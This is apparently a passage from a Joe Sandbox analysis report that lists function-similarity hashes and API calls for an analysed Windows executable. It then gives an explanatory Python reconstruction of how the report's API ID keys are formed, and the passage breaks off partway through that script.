                                      • Opcode ID: 8a8df3dc892b91b579a0b075b1313b3b78b2533db13d3ecb135e739853f28001
                                      • Instruction ID: 64b7647086f4196d5fdd54efd03fcdaef97a694509e9383724e4a18768ba8d05
                                      • Opcode Fuzzy Hash: 8a8df3dc892b91b579a0b075b1313b3b78b2533db13d3ecb135e739853f28001
                                      • Instruction Fuzzy Hash: 9351B262F0564286FB10ABA5E4412FC2362AF89B9CF580276DE0DF77D6EE2CE541C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2371198981-0
                                      • Opcode ID: 7af7209a03675e02a4b704b17e606e53c044e410c4768cf86d51e40c4e993159
                                      • Instruction ID: ab204c7b9fc6aa505d215d4b24599dd541ff603be1392002ca92eb4ae19a2280
                                      • Opcode Fuzzy Hash: 7af7209a03675e02a4b704b17e606e53c044e410c4768cf86d51e40c4e993159
                                      • Instruction Fuzzy Hash: 73413521B0864681EA14EF5AE544279A391EF08BE8F584631DE7CD7BD5EF3CE095C304
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2272807158-0
                                      • Opcode ID: a0dc123f22a855cf25d97852fe41284ea3799d90fc4df8cd16141fb6b158bd92
                                      • Instruction ID: dea60fde6372e4f0bc94fd218c1a09304f367d126cd5549cd8bd7758a44d9e4b
                                      • Opcode Fuzzy Hash: a0dc123f22a855cf25d97852fe41284ea3799d90fc4df8cd16141fb6b158bd92
                                      • Instruction Fuzzy Hash: 3241B172A0878286EB248F65E44426967A1FF85BB8F184374DFAD97BD5CF3CE4908700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2176759853-0
                                      • Opcode ID: 276560ff51f44e2726fc42c2034d76ebac9f75443b4299cef8fd919ee51c8c72
                                      • Instruction ID: 7a6f330bfe6846763a1d628c0b6f6be94e51493a9d01326fc25df050c08a58f7
                                      • Opcode Fuzzy Hash: 276560ff51f44e2726fc42c2034d76ebac9f75443b4299cef8fd919ee51c8c72
                                      • Instruction Fuzzy Hash: 6721A462A19B8281EA149B69F44016A6361FF8DBD4F184235EF9D93B95DF3CD191C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: std::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 1875163511-0
                                      • Opcode ID: db20e05753df598e894c5cc758c65fbe96d0cfc7e1b9329a64eb04cdedcb9e75
                                      • Instruction ID: 3e5110304131cdf58cc986051e38f28762dfa1af5d104b0e664d452e8adb93de
                                      • Opcode Fuzzy Hash: db20e05753df598e894c5cc758c65fbe96d0cfc7e1b9329a64eb04cdedcb9e75
                                      • Instruction Fuzzy Hash: 16317263A09A8691FB249B14E4443B963E0FF40B8CF5C0572D64DE66B5DF7CE656C301
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1203560049-0
                                      • Opcode ID: 7fdf0cd4e5230aa7621eabec0e784b37c7ed14eccba0dac1b5def99b4e7a5bba
                                      • Instruction ID: 971d819aba0383a9a29758239a579000c51bf1094e51c3d64d7006f288b3f5e8
                                      • Opcode Fuzzy Hash: 7fdf0cd4e5230aa7621eabec0e784b37c7ed14eccba0dac1b5def99b4e7a5bba
                                      • Instruction Fuzzy Hash: 5321D722B18B8282EE208F25E44526E6361FFC9B98F185270EE9ED3795DF3CD544C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3118131910-0
                                      • Opcode ID: ce21ccb842952d462125c9b16cbb9ae1d7f1021018c759017b763d9352aedc07
                                      • Instruction ID: 8e2b496af40d849a22453500d5a583a0aeeb846057cadedd3619df98a0d69eda
                                      • Opcode Fuzzy Hash: ce21ccb842952d462125c9b16cbb9ae1d7f1021018c759017b763d9352aedc07
                                      • Instruction Fuzzy Hash: 9C21C532A1878282EA108F25F44526E7361FFC9B98F540270EAADE3B99DF3CD540C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1203560049-0
                                      • Opcode ID: a08150f23ae7dab96dd29fe21bc2aeddd134a8a0159e4438a73a447bedda0e2b
                                      • Instruction ID: a258215bd08a83cc5bf6fb155abea07442ca859bb89537e73f13c4df998eaaac
                                      • Opcode Fuzzy Hash: a08150f23ae7dab96dd29fe21bc2aeddd134a8a0159e4438a73a447bedda0e2b
                                      • Instruction Fuzzy Hash: 5F215332A1878282EE109F29F4451296361FFC9BA8F681271EAADD7BD9DF3CD541C704
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
                                      • Instruction ID: 14b4a367eafcfbb2bc618a4bfe7d863bc2cbd15e5572a357bafe4a90a5ed215c
                                      • Opcode Fuzzy Hash: 8918d945bc68b986d9b4f63ac5cfb24cb8c1f3a7e8295ea6f783a439b1dda531
                                      • Instruction Fuzzy Hash: 61E04F24B0530746FB546F3199913792362AFC8749F0844B9D80EE3396CE3DA40A8B00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A35F8A5
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A35F8AB
                                        • Part of subcall function 00007FF65A363E88: FindClose.KERNELBASE(?,?,00000000,00007FF65A370791), ref: 00007FF65A363EBD
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                      • String ID:
                                      • API String ID: 3587649625-0
                                      • Opcode ID: e36c883a4f5a44fe44a2e8c509133dbe774585f7eed481499094dcfca338fab8
                                      • Instruction ID: c2731780e8207507595fdc6f5f23831fb89fc9ce45bb2d8583c9bcfc7dda9776
                                      • Opcode Fuzzy Hash: e36c883a4f5a44fe44a2e8c509133dbe774585f7eed481499094dcfca338fab8
                                      • Instruction Fuzzy Hash: 82919E33A18B8294EB10DF68D4402AD6761FF8879CF584276EA5CE7AE9DF78D585C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: b933e48cc479ebd876a1f2a1e0456f7663a1db4da981dfbbbb2b213dcd6c33a5
                                      • Instruction ID: f4a99a99010aca68992e2c6305de7fdfaa1a6ae7f46e0386fcea21759b9dd4b3
                                      • Opcode Fuzzy Hash: b933e48cc479ebd876a1f2a1e0456f7663a1db4da981dfbbbb2b213dcd6c33a5
                                      • Instruction Fuzzy Hash: 6941CE62F1565284FB00DBB9E4507AD2721AF49BDCF181275EE1DF7A8ADE38D4828300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF65A36270D), ref: 00007FF65A362869
                                      • GetLastError.KERNEL32(?,00007FF65A36270D), ref: 00007FF65A362878
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
                                      • Instruction ID: 05edf1393b690ae27ebab9a67ebb7e2465397e7fc22b74fd660e65654e0133c8
                                      • Opcode Fuzzy Hash: 15a0c32312994542f24a0a355b1d122a2bfdb3c55d25b91561185cfc545188a1
                                      • Instruction Fuzzy Hash: 4031E472F19A4286FE604F6AD940AB92790AF44BDCF1D1171DE1DE77A1DE3CE8828740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: Item_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1746051919-0
                                      • Opcode ID: f869e1ad6fe17fa6b2403a971d0deef91c5c1ce91a4dc3bedbf5af38928ecb6f
                                      • Instruction ID: 171d568e741fb01191628c4a2daeb2b68b161a7084dff58fe102b3b1a7a78cb1
                                      • Opcode Fuzzy Hash: f869e1ad6fe17fa6b2403a971d0deef91c5c1ce91a4dc3bedbf5af38928ecb6f
                                      • Instruction Fuzzy Hash: 6C31C222A1978282EA149F59F44536E7361EF88798F584271EB9CE7B95DF3CE580C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                      • Instruction ID: 23b44e77d0ee78428074895b97f1bf196dc3d3623eaaa88e187d6ac11630785f
                                      • Opcode Fuzzy Hash: e2360d92fa371ec3cf3789b724fac7dc0eee746b57302bb10420cb3d80e8e918
                                      • Instruction Fuzzy Hash: BC21B022E0E74755EA718A91E5013BA6790EF41798F1E84B1DE4CE7391EE7CD48AC300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID:
                                      • API String ID: 2948472770-0
                                      • Opcode ID: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                      • Instruction ID: 6f1014503c6dd8fe685434e313e1ac69496291af300038e37087de783223d6b0
                                      • Opcode Fuzzy Hash: 50b4215183bbe14799031b3cc2031c8d40844f06fe2ec6e88c7f343e0a5df25c
                                      • Instruction Fuzzy Hash: DD115E71B08B4586EA009F16F844169B7A2BF89FC8F6846B5CA0DF3725DE7CE5418344
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                      • Instruction ID: aff43cd58ae45becef4702922effc082c859a37afa6d66831ce49ce909ba2d73
                                      • Opcode Fuzzy Hash: b516d334dd1c85efa09aca89d3d43d2e2cc6a6d2d54fdbc8055284d5c2cf1125
                                      • Instruction Fuzzy Hash: 02119D21E1864282FB608F65E4416696760EF45BA8F5943B1DA2DE73E4DF3DD886C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item$RectText$ClientWindowswprintf
                                      • String ID:
                                      • API String ID: 402765569-0
                                      • Opcode ID: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                      • Instruction ID: 4825cb6a0ff62fe21f79ef610f341fe68d9b3f440a32eb2145f3078515222990
                                      • Opcode Fuzzy Hash: b1e1e049dd5e2ad137b0382b0bc9e4d843d915bd339b20a0dba0486b348c3455
                                      • Instruction Fuzzy Hash: 0E017120E0D64A41FF595796F4582799792AF8974CF1C04B4E80DE63D9DE2CE984C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF65A36EB29,?,?,?,?,00007FF65A365712,?,?,?,00007FF65A36569E), ref: 00007FF65A36EAD8
                                      • GetProcessAffinityMask.KERNEL32 ref: 00007FF65A36EAEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                      • Instruction ID: 98d20084ff76187a91f4cb490abe3af0208c6ae1d4cfc3daf2353edb5f0c7a9b
                                      • Opcode Fuzzy Hash: 79722ee71258bf1dae4358653295d549d31541bd73e3f7913cc80f15ba5fc09c
                                      • Instruction Fuzzy Hash: 9FE02B61F1858687DF088F55D4414E9A391FFC8B44B888036D50BD3714DE2CE54D8B00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                      • String ID:
                                      • API String ID: 1173176844-0
                                      • Opcode ID: 0646b662c6caf26ca8bb2dc0f60ca6e00d23c2a3568bc0781e7d6fe9fe79912a
                                      • Instruction ID: 70af0d2d98ce91b0d67dad83b7ed06381ad5477bf2385883ab11d95de716472c
                                      • Opcode Fuzzy Hash: 0646b662c6caf26ca8bb2dc0f60ca6e00d23c2a3568bc0781e7d6fe9fe79912a
                                      • Instruction Fuzzy Hash: 57E01240E1B10B05FD1836E118651B901540F587BCE7C1BF0DF3DE82D6AD1CB5624110
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: ErrorLanguagesLastPreferredRestoreThread
                                      • String ID:
                                      • API String ID: 588628887-0
                                      • Opcode ID: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                      • Instruction ID: d21c41de6eed7aabbae2eb396abe5ff24893cf74482fdb1eb2753916a9f009b1
                                      • Opcode Fuzzy Hash: d6a2b49c909fc4b479ef785cefb012946a1a1cb3df5903558656f65a622c367e
                                      • Instruction Fuzzy Hash: 6EE0EC50E0A64786FF58AFF2A8461B857D19F94B9DF0C40B4C90DE7291EF2CA4868620
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 2f6a0a89bbd07f64e458e12061b98e9bd87d2c63ce1f8f54119cd6cd17c1ff9d
                                      • Instruction ID: f17f2d1d7dc40d535d95831abf0d4ddd7231dc0fbceb179528059fabfbaf1895
                                      • Opcode Fuzzy Hash: 2f6a0a89bbd07f64e458e12061b98e9bd87d2c63ce1f8f54119cd6cd17c1ff9d
                                      • Instruction Fuzzy Hash: 4AD1C772B0868256EB688B29E6542B977A1FF49BC8F0C04B5CB5DD77A1CF3CE4658700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1017591355-0
                                      • Opcode ID: 5c40b76446255340c5d262157ec7654f8a2ee4ae9d13424f945488b1100eaa8f
                                      • Instruction ID: 0c2b054412b91718f88ab58ca26c1df99f7bfff5ae5fa893c324580ca2bc6b39
                                      • Opcode Fuzzy Hash: 5c40b76446255340c5d262157ec7654f8a2ee4ae9d13424f945488b1100eaa8f
                                      • Instruction Fuzzy Hash: 2C614612E0D24341FA659A26980627E6291AF41BDCF2C41F1EE4DF7BD5EE7CE4418210
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A36E8C4: ReleaseSemaphore.KERNEL32 ref: 00007FF65A36E8F0
                                        • Part of subcall function 00007FF65A36E8C4: FindCloseChangeNotification.KERNELBASE ref: 00007FF65A36E90F
                                        • Part of subcall function 00007FF65A36E8C4: DeleteCriticalSection.KERNEL32 ref: 00007FF65A36E926
                                        • Part of subcall function 00007FF65A36E8C4: CloseHandle.KERNEL32 ref: 00007FF65A36E933
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A371A4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1624603282-0
                                      • Opcode ID: e795079a6edea56bef335adced2029c40f45edfcc92fcc337fe269507fbbd6aa
                                      • Instruction ID: 19d4835a36e8d8bcd0a0af4ab3e475c66e4da6554e77bdc159fb4581380e5c76
                                      • Opcode Fuzzy Hash: e795079a6edea56bef335adced2029c40f45edfcc92fcc337fe269507fbbd6aa
                                      • Instruction Fuzzy Hash: 6A61A263B16686A2EE08CB65D5540BC73A5FF41F98B184172DB2ED7AD1CF2CE5718300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 3668304517-0
                                      • Opcode ID: 3f163f76348f7732a813e490356459241e3afcb60505f443c62b2663502e283f
                                      • Instruction ID: 9cd0826c8c06ecf3037702a3f30964d880f87104f584267c09e8d26d776c147c
                                      • Opcode Fuzzy Hash: 3f163f76348f7732a813e490356459241e3afcb60505f443c62b2663502e283f
                                      • Instruction Fuzzy Hash: C951C662A0864241FA149B1AE4443BD6751FF8ABD8F5C01B6EE4DD7392CE3DE485C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00007FF65A363E88: FindClose.KERNELBASE(?,?,00000000,00007FF65A370791), ref: 00007FF65A363EBD
                                      • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF65A35E9A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 1011579015-0
                                      • Opcode ID: a1d4ef8998a34a1d3b498b39c53fa5848762244e0c56bed900b2fa4669bedafd
                                      • Instruction ID: d2fa9226adf5ef3eeea28e6d212cc7dca00c57639575fd34380059b039b41caf
                                      • Opcode Fuzzy Hash: a1d4ef8998a34a1d3b498b39c53fa5848762244e0c56bed900b2fa4669bedafd
                                      • Instruction Fuzzy Hash: 32518F22A08A8681FA64CF69D44536D2361FF89B88F5C01B5DA8DE77A5DF2CE445C710
                                      Uniqueness

                                      Uniqueness Score: -1.00%
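
Three of the records above list both the exact API calls a function makes and the resulting "API ID" similarity key (Process$AffinityCurrentMask from GetCurrentProcess + GetProcessAffinityMask; Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn from the semaphore/critical-section teardown subcall; CloseFind_invalid_parameter_noinfo_noreturn from FindClose). That is enough to see how the key is built: each Win32 symbol is split into CamelCase words, words are counted across all calls in the function, and the words are emitted in groups of descending frequency, "$"-separated, each group sorted by code point (which is why CRT helpers starting with "_" land after "Semaphore"). The script below is an added reconstruction written for this page, not Joe Sandbox code, and it rests on two assumptions that the report does not state: the verb prefixes Get/Set are discarded (the page shows no "Get" token anywhere, but "Set" is an extrapolation), and tokens shorter than three characters (A/W suffixes, "UI") are discarded. The numeric "API String ID" is a hash whose algorithm the report does not give, so it is not reproduced. Input lines are copied from the records on this page; the GetLastError + RestoreThreadPreferredUILanguages pair is an assumed input chosen because it yields the page's ErrorLanguagesLastPreferredRestoreThread key.

```python
import re
from collections import Counter

# API bullet lines copied from the "APIs" lists of three records on this page.
REPORT_RECORDS = {
    "affinity": [
        "• GetCurrentProcess.KERNEL32(?,?,?,?,00007FF65A36EB29,?,?,?,?,00007FF65A365712,?,?,?,00007FF65A36569E), ref: 00007FF65A36EAD8",
        "• GetProcessAffinityMask.KERNEL32 ref: 00007FF65A36EAEB",
    ],
    "teardown": [
        "• Part of subcall function 00007FF65A36E8C4: ReleaseSemaphore.KERNEL32 ref: 00007FF65A36E8F0",
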